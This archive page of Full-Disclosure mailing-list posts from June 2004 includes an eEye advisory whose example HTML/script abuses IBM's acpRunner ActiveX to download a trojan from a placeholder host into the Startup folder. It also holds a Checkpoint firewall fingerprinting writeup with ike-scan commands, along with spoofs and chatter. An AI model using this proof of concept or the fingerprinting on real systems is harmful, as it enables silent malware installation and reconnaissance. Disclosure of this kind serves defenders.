http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-5186
0

Credit:
Discovery: Drew Copley
Additional Research: http-equivmalware.com

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html

Another Quote of the Day:
"A man's greatest work is to break his enemies, to drive them before
him, to take from them all the things that have been theirs, to hear the
weeping of those who cherished them." - Genghis Khan

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alerteEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] IBM acpRunner Activex Dangerous Methods Vulnerability

From: Drew Copley (dcopleyeEye.com)
Date: Wed Jun 16 2004 - 13:45:57 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

IBM acpRunner Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):
116

Severity:
High (Remote Code Execution)

Vendor:
IBM

Systems Affected:
acpRunner Activex Version 1.2.5.0

Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed "acpRunner" activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. An unknown number of systems
already have this activex on their systems.

In this case, IBM made available methods named such as "DownLoadURL",
"SaveFilePath", and "Download". Almost needless to say, these methods
allow a remote attacker to have a victim system silently download the
file of their choosing into the location of their choosing. By
downloading an executable file to the Startup folder, this malicious
executable would be automatically executed on start up.

Technical Details:
-----------EXAMPLE HTML---------

|object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
ontrol.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
AAEQIAAA==">
|object|

|script|
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
|script|

---------------------------------

In the above example, we see the object called utilizing the "object"
tag. The codebase tag is used by the browser to initiate the install of
the activex if it is not already existing on the system. This would
bring up the activex prompt which essentially asks the user if they
trust IBM. Finally, the object is named "runner", so we might reference
it later in script and use its' dangerous methods.

In the script we see we access the dangerous methods of "runner" in a
completely straightforward manner. The "saveFilePath" method uses a
local url on the user's system which will accurately point to the user's
startup folder. Finally, the method "Download" is called, and a progress
meter shows the trojan file being downloaded to the exploit folder on
the user's system. At restart, the OS would automatically run the
trojan.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-5186
0

Credit:
Discovery: http-equivmalware.com
Additional Research: Drew Copley

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html

Quotes of the Day:
"Fuggedboutit" - the "Cosa Nostra" community as reported by "Donnie
Brasco" (aka, Joe Pistone, FBI)

"You know what glamour is? It is fear." - The Krays (1981)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Michael Gargiullo (mgargiullowarpdrive.net)
Date: Wed Jun 16 2004 - 15:43:41 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 2004-06-16 at 14:25, joe smith wrote:
> I used PE Explorer.
>
> Looks the june4.exe is some kind of spyware. It reference to another
> site "cjdra.com", possibly uploading user information there.
>
> I just started learning assembly, please pardon my lack of knowledge on
> reverse engineering.
>
> J

By chance, do you know of a similar tools that runs under linux?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

From: Hugo Vazquez Carapez (infohackinghushmail.com)
Date: Wed Jun 16 2004 - 14:59:36 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

File Source disclosure vulnerability in all web servers.

Infohacking Security Advisory 04.16.04
www.infohacking.com
Jun 16, 2004

I. BACKGROUND

We discovered a very dangerous file source disclosure vulnerability in
all
webservers. This issue can be exploited using Microsoft Internet Explorer
and probably other browsers.

II. DESCRIPTION

Remote explotation of this issue can be achived by clicking with the
right button into the website and selecting the "view source code" option.
This option will display the contents of the html code.

For more leet explotation is also possible using lynx --source http://vulnerable.site/file.html

III. ANALYSIS

Successful exploitation allows an attacker to gain very very very sensible
information of the website.

IV. DETECTION

Infohacking has confirmed that all webservers are vulnerable to this
problem. Sites like microsoft, securityfocus, hack.co.za and others are
vulnerable too!

V. WORKAROUNDS

No work.. indeed.

VI. CVE INFORMATION

This is an 0day bug... so still no bid and CVE.

VII. DISCLOSURE TIMELINE

02/18/04 Hugo notified the bug to abuse255.255.255.255
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com
06/17/04 Public Disclosure

VIII. CREDIT

Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif

Get pwned by script kiddies?
Call us, we can hack you again.

IX. LEGAL NOTICES

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically, please

email infoinfohacking.com for permission.

Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
of the blackhat communitie, please hack and remove us from the net

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

Valdis.Kletnieksvt.edu
Date: Wed Jun 16 2004 - 15:57:10 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel <peterbank-connect.com> said:
> Indeed. DNS's, AS's and what not else is required to make the internet
> tick; all is centrally controlled and delegated. What's missing is a
> flanking reverse of resposibilities. It's idiotic that providers or even
> full countries can completely ignore / reject any complaint without
> having their AS or DNS taken down.

In other arenas, they call the concept "diplomatic immunity"....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA0LQmcC3lWbTT17ARArO6AJ9a4KydTf4jYojEHoyHEVA2tdvFZgCg4hZU
PUPjux+XqcwMFldTrgar86M=
=VPbq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage

From: ADT (synfinaticgmail.com)
Date: Wed Jun 16 2004 - 16:13:55 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

So basically, the "issue" is that Checkpoint is following RFC 2408 (ISAKMP)?

Specifically section 3.16:

"The Vendor ID Payload contains a vendor defined constant. The
constant is used by vendors to identify and recognize remote
instances of their implementations. This mechanism allows a vendor
to experiment with new features while maintaining backwards
compatibility. "

While perhaps this is unfortunate, it is clearly documented and I
know that Brett Eldridge gave a talk on this specific issue at DefCon
X.

-Aaron

On Wed, 16 Jun 2004 15:45:29 +0100, Roy Hills <roy.hillsnta-monitor.com> wrote:
>
> Checkpoint Firewall-1 IKE Vendor ID information leakage
>
> Introduction:
>
> Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
> return an IKE Vendor ID payload when it receives an IKE packet with
> a specific Vendor ID payload. The Vendor ID payload that is returned
> identifies the system as Checkpoint Firewall-1 and also determines the
> Firewall-1 version and service-pack or feature-pack revision number.
> This is an information leakage issue which can be used to fingerprint
> the Firewall-1 system.
>
> This information leakage issue has been verified for Checkpoint Firewall-1
> versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
> version 4.0 is not vulnerable because it does not return any Vendor ID
> payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
> because they do not support IPsec VPN. However, most people are running
> either NG or 4.1 and therefore this issue will apply to most Firewall-1
> installations that have IPsec VPN enabled.
>
> I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
> and demonstrate this issue.
>
> Full details are available at:
> http://www.nta-monitor.com/news/checkpoint2004/index.htm
>
> Details:
>
> If an IKE Phase-1 packet with a Vendor ID payload containing the data
> "f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
> encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
> or higher which supports IKE, the Firewall will respond with a Vendor ID
> payload containing data which identifies it as a Checkpoint Firewall-1
> system, provides details about the version of the Firewall software,
> and contains some additional information.
>
> The data that is returned in the Vendor ID payload from the
> Firewall consists of the same 20-byte sequence that was sent
> (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
> of data that contains the encoded version number and some other details
> that appear to contain details of the Firewall's capabilities.
>
> I presume that the 20-byte "magic string" is an SHA1 hash of something.
> I'd be interested to find out what source string hashes to this value.
>
> Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
> NG AI R55 (latest current version), I have found the following returned
> Vendor ID payloads. In the payloads below, a dot (".") represents an
> arbitary hex digit:
>
> Firewall-1 4.1 Base (no service pack)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000
>
> Firewall-1 4.1 SP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000
>
> Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000
>
> rshradon [537]$
> rshradon [537]$
> rshradon [537]$
> rshradon [537]$ cat ,,
> [Note to moderator: I notified Checkpoint of this issue on 13th April
> 2004, but have not received any response apart from a "We've received
> your Email" auto-reply.]
>
> Introduction:
>
> Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
> return an IKE Vendor ID payload when it receives an IKE packet with
> a specific Vendor ID payload. The Vendor ID payload that is returned
> identifies the system as Checkpoint Firewall-1 and also determines the
> Firewall-1 version and service-pack or feature-pack revision number.
> This is an information leakage issue which can be used to fingerprint
> the Firewall-1 system.
>
> This information leakage issue has been verified for Checkpoint Firewall-1
> versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
> version 4.0 is not vulnerable because it does not return any Vendor ID
> payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
> because they do not support IPsec VPN. However, most people are running
> either NG or 4.1 and therefore this issue will apply to most Firewall-1
> installations that have IPsec VPN enabled.
>
> I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
> and demonstrate this issue.
>
> Full details are available at:
> http://www.nta-monitor.com/news/checkpoint2004/index.htm
>
> Details:
>
> If an IKE Phase-1 packet with a Vendor ID payload containing the data
> "f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
> encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
> or higher which supports IKE, the Firewall will respond with a Vendor ID
> payload containing data which identifies it as a Checkpoint Firewall-1
> system, provides details about the version of the Firewall software,
> and contains some additional information.
>
> The data that is returned in the Vendor ID payload from the
> Firewall consists of the same 20-byte sequence that was sent
> (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
> of data that contains the encoded version number and some other details
> that appear to contain details of the Firewall's capabilities.
>
> I presume that the 20-byte "magic string" is an SHA1 hash of something.
> I'd be interested to find out what source string hashes to this value.
>
> Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
> NG AI R55 (latest current version), I have found the following returned
> Vendor ID payloads. In the payloads below, a dot (".") represents an
> arbitary hex digit:
>
> Firewall-1 4.1 Base (no service pack)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000
>
> Firewall-1 4.1 SP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000
>
> Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
> f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000
>
> Firewall-1 NG Base
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013880000000000000000....0000
>
> Firewall-1 NG FP1
> f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013890000000000000000....0000
>
> Firewall-1 NG FP2
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a0000000000000000....0000
>
> Firewall-1 NG FP3
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138b0000000000000000....0000
>
> Firewall-1 NG AI R54
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c0000000000000000....0000
>
> Firewall-1 NG AI R55
> f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138d0000000000000000....0000
>
> The version part is given in character positions 53 - 56 inclusive.
> E.g. "138d" (decimal 5005) for NG AI R55.
>
> Here's an example using ike-scan v1.6 with an NG FP2 Firewall. Here,
> we are specifying RSA authentication with --auth=3 to get the Firewall
> to handshake as well as providing the Firewall-1 Vendor ID:
>
> $ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=3 -M
> 172.16.2.2
> Starting ike-scan 1.6 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
> 172.16.2.2 Main Mode Handshake returned
> SA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024
> LifeType=Seconds LifeDuration(4)=0x00007080)
> VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000
> (Firewall-1 NG FP2)
>
> Ending ike-scan 1.6: 1 hosts scanned in 0.009 seconds (108.96 hosts/sec).
> 1 returned handshake; 0 returned notify
>
> Here is a second example fingerprinting an NG AI R54 Firewall using
> hybrid authentication (--auth=64221):
>
> $ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=64221
> -M 172.16.2.2
> Starting ike-scan 1.5.3 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
> 172.16.2.2 Main Mode Handshake returned
> SA=(Enc=3DES Hash=SHA1 Auth=64221 Group=2:modp1024
> LifeType=Seconds LifeDuration(4)=0x00007080)
> VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c000000000000000018800000
> (Firewall-1 NG AI R54)
>
> References:
>
> http://www.nta-monitor.com/news/checkpoint2004/index.htm Issue details
> http://www.nta-monitor.com/ike-scan/ ike-scan tool
> --
> Roy Hills Tel: +44 1634 721855
> NTA Monitor Ltd FAX: +44 1634 721844
> 14 Ashford House, Beaufort Court,
> Medway City Estate, Email: Roy.Hillsnta-monitor.com
> Rochester, Kent ME2 4FA, UK WWW: http://www.nta-monitor.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
--
http://synfin.net/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: joe smith (joejoesmith.homeip.net)
Date: Wed Jun 16 2004 - 16:43:40 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://upx.sourceforge.net/#download

Michael Gargiullo wrote:

>On Wed, 2004-06-16 at 14:25, joe smith wrote:
>
>
>>I used PE Explorer.
>>
>>Looks the june4.exe is some kind of spyware. It reference to another
>>site "cjdra.com", possibly uploading user information there.
>>
>>I just started learning assembly, please pardon my lack of knowledge on
>>reverse engineering.
>>
>>J
>>
>>
>
>By chance, do you know of a similar tools that runs under linux?
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: José María Mateos (josemaria.mateoshispalinux.es)
Date: Wed Jun 16 2004 - 17:00:29 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

El martes 15 de junio a las 18:57, Syed Imran Ali escribió:
> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.

.es still does, and they say it's not going to change, at least
for a while.

Regards.

--
** Las Penas del Agente Smith: http://chema.homelinux.org **
http://EuropeSwPatentFree.hispalinux.es - EuropeSwPatentFree
GPG key ID: 0x2948FA19 | Please encrypt private mail

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA0ML99P6GbSlI+hkRAotbAJ4td1Gu/3zcr8UU6gn49SJRmXKh/ACbBx6F
dta56x6/cq3dbUJ5K8ku0ag=
=fNIu
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Peter van den Heuvel (peterbank-connect.com)
Date: Wed Jun 16 2004 - 16:57:46 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Yo!

> In other arenas, they call the concept "diplomatic immunity"....
Indeed. And is almost as idiotic there. But the issue is that the
Internet does not have any "reverse responsibility" mechanism; an evil
minor-player under a lax-average-provider can do whatever he feels that
suits him best, and disregard majority opinion. An anarchy without even
fundamental feedback regulatory mechanisms is simply prey; me paying for
anothers fortune. And the least thing that would work is governments
imposing their preferences. So maybe ICAN and the likes should consider
some form of responsibility in these matters.

Alas, Peter

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

From: morning_wood (se_cur_ityhotmail.com)
Date: Wed Jun 16 2004 - 17:23:09 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

rofl, are you sure your not "Bipin" ?

>Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.

> File Source disclosure vulnerability in all web servers.
> Remote explotation of this issue can be achived by clicking with the
> right button into the website and selecting the "view source code" option.
> This option will display the contents of the html code.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] MS Anti Virus?

From: Andre Ludwig (andre.ludwiggmail.com)
Date: Wed Jun 16 2004 - 17:53:45 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Oh this should be good...

http://www.reuters.com/newsArticle.jhtml?storyID=5429092

SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
Research) is still on track to offer an anti-virus product that will
compete against similar software offered by Symantec Corp. (SYMC.O:
Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
Profile, Research) , the world's largest software maker said late on
Monday.

Mike Nash, chief of Microsoft's security business unit, told reporters
that Microsoft is developing software to protect personal computers
running Windows against malicious software, the worms and viruses that
have plagued users with data loss, shutdowns and disruptions in Web
traffic in recent years.

"We're still planning to offer our own AV (anti-virus) product," Nash said.

Asked if that would hurt sales of competing products, such as Network
Associates' McAfee and Symantec's Norton family of products, Nash said
that Microsoft said that it would sell its anti-virus program as a
separate product from Windows, rather than including it in Windows.

Redmond, Washington-based acquired anti-virus technology from GeCAD
Software Srl., a Romanian software company, last year to develop its
own software.

Microsoft, whose Windows operating system is a favorite target for
computer viruses, launched a company-wide "Trustworthy Computing"
campaign in early 2002 to boost the security and reliability of its
software.

Nash did not give a time frame for the release of Microsoft's
anti-virus software.

and another

http://www.entmag.com/news/article.asp?EditorialsID=6272

by Scott Bekker

6/16/04

Microsoft is leaning toward offering a paid anti-virus subscription service.

Mike Nash, corporate vice president for the security business and
technology unit at Microsoft, said Microsoft will probably sell its
own anti-virus software and subscription service. It is the first
public signal that Microsoft intends to turn its acquisition of the
Romanian anti-virus company GeCAD into a product customers pay for.

The comments came up at a dinner with reporters in Seattle on Monday
night when Nash was asked how Microsoft's anti-virus efforts might
affect Symantec. "I want to make sure customers have another choice,"
the Bloomberg News agency quoted Nash as saying. "Some people will
continue to use Symantec, and some will use ours."

-- advertisement --

Shares of Symantec, which gets 85 percent of its revenues from
anti-virus products, were down following Nash's comments, according to
Bloomberg.

Previously, Microsoft had been coy about its plans for GeCAD, which it
acquired last June. "This acquisition will help us and our partner
anti-virus providers further mitigate risks from these threats," Nash
said at the time, implying Microsoft would use GeCAD's programming
talent to make Windows and other Microsoft products more resistant to
viruses.

But Microsoft also immediately indicated at the time that it was fully
evaluating how to proceed with GeCAD's technology and employees. In a
white paper published last June on Microsoft's Web site, the company
wrote, "Details of the Microsoft antivirus solution, including any
product plans, pricing, and a timeline for delivery, are not yet
available. Microsoft strongly recommends that customers continue to
use antivirus solutions from industry partners and keep their virus
signatures updated."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Andre Ludwig (andre.ludwiggmail.com)
Date: Wed Jun 16 2004 - 17:49:08 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Just think of all those l33t 0-days you can now have in your webmail!!!

;)

This is definatly OT..

Andre Ludwig CISSP

On Tue, 15 Jun 2004 11:42:10 -0500 (CDT), Ron DuFresne
<dufresnewinternet.com> wrote:
>
>
> The real questions fellows is though, what does any of this have to do
> with security, and who cares how much storage space your particular ISP or
> e-mail provider supplies?
>
> Thanks,
>
> Ron DuFresne
>
>
>
> On Tue, 15 Jun 2004, William Warren wrote:
>
> > hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
> >
> >
> > Syed Imran Ali wrote:
> >
> > > Hiya,
> > >
> > > It is nice to see my inbox today, having 100MB or storage space, 84%
> > > remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> > > about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
> > >
> > > Regards,
> > >
> > > S. Imran Ali
> > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> > --
> > My "Foundation" verse:
> > Isa 54:17 No weapon that is formed against thee shall prosper; and
> > every tongue that shall rise against thee in judgment thou shalt
> > condemn. This is the heritage of the servants of the LORD, and their
> > righteousness is of me, saith the LORD.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] MS Anti Virus?

http-equivexcite.com
Date: Wed Jun 16 2004 - 18:29:58 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Well they can't get a simple thing like a mail client right,
they can't get a semi-simple thing like a browser right, they
can't get not-so-simple thing like an operating system right, so
let's branch out and fuck up some other things.

No doubt a few years from now you'll see a line of food in the
stores with their name on it. No doubt limited to doughnuts and
pretzels.

At least they can charge for a whole and the customer will
insist on a portion.

HOLE IN ONE ! gOLf cOURSEs next.

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] MS Anti Virus?

From: Andre Ludwig (andre.ludwiggmail.com)
Date: Wed Jun 16 2004 - 18:55:23 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Think the mafia refers to this as a protection racket...

man so much can be made of this its a techy comedy gold mine.

"our software sucks so bad that the market for anti virus software for
our platform is such a lucrative market that we cant stay out of it"

Andre Ludwig CISSP

On Wed, 16 Jun 2004 19:41:49 -0400, slacker <leetslackersofthome.net> wrote:
>
> <snip>
> > SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
> > Research) is still on track to offer an anti-virus product that will
> > compete against similar software offered by Symantec Corp. (SYMC.O:
> > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
> > Profile, Research) , the world's largest software maker said late on
>
> Oh yeah, what's the average delay to release on exploit patches? What makes
> me think that they are going to be that slow on releasing AV updates? =P
>
> slacker
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Shawn Nunley (nunleygmail.com)
Date: Wed Jun 16 2004 - 20:28:44 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Did anyone else notice that they also raised the storage limit to 2Gb
for paid account holders? (SBC Yahoo DSL and accounts like that,
19.99/mo)

That's quite a lot of spam storage.

Wanna talk about security? How about all those phishing and spam
emails being stored (and potentially opened) for far longer than was
possible before. Seems like a security problem waiting to happen.

So far, in my Gmail account, I've had exactly 0 spam emails, and I
have that address pasted all over the web. Either their spam
filtering is incredible, or the spammers haven't picked it up yet. My
Yahoo account, on the other hand, is 100% spam except for mailing list
traffic.

-Shawn

Shawn Nunley, CISSP
Director, Technology Development
NetScaler, Inc.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Shawn Nunley (nunleygmail.com)
Date: Wed Jun 16 2004 - 20:37:24 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

sorry, I meant to say 19.99/year, not per month for the 2gb storage limit.

On Wed, 16 Jun 2004 18:28:44 -0700, Shawn Nunley <nunleygmail.com> wrote:
>
>
> Did anyone else notice that they also raised the storage limit to 2Gb
> for paid account holders? (SBC Yahoo DSL and accounts like that,
> 19.99/mo)
>
> That's quite a lot of spam storage.
>
> Wanna talk about security? How about all those phishing and spam
> emails being stored (and potentially opened) for far longer than was
> possible before. Seems like a security problem waiting to happen.
>
> So far, in my Gmail account, I've had exactly 0 spam emails, and I
> have that address pasted all over the web. Either their spam
> filtering is incredible, or the spammers haven't picked it up yet. My
> Yahoo account, on the other hand, is 100% spam except for mailing list
> traffic.
>
> -Shawn
>
> Shawn Nunley, CISSP
> Director, Technology Development
> NetScaler, Inc.
>

--
Shawn Nunley, CISSP
Director, Technology Development
NetScaler, Inc.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Re: Akamai

From: gabriel rosenkoetter (greclipsed.net)
Date: Wed Jun 16 2004 - 20:44:17 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, Jun 16, 2004 at 04:57:10PM -0400, Valdis.Kletnieksvt.edu wrote:
> On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel <peterbank-connect.com> said:
> > flanking reverse of resposibilities. It's idiotic that providers or even
> > full countries can completely ignore / reject any complaint without
> > having their AS or DNS taken down.
> In other arenas, they call the concept "diplomatic immunity"....

In those same arenas, they call the denial of privilege by an
unrecognized entity (or entities) "anarchy". Which is one of those
things that sounds like a really good idea till you're no longer
in the de facto majority. ("They came for...")

On Wed, Jun 16, 2004 at 12:23:35PM -0500, Paul Schmehl wrote:
> Unless networks begin doing this routinely (including ISPs), legislation
> will be introduced to "solve" the problem, and then we will all be much
> worse off. There's nothing like a law to completely screw things up.

Actually, a clearly defined, limited, exact law is precisely what
we need here. We just lack any appropriate legislative body. (No
national legislature qualifies, and no international body--they
exist: NATO, UN, EU--can make a plausible claim to jurisdiction.)

--
gabriel rosenkoetter
greclipsed.net

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (NetBSD)

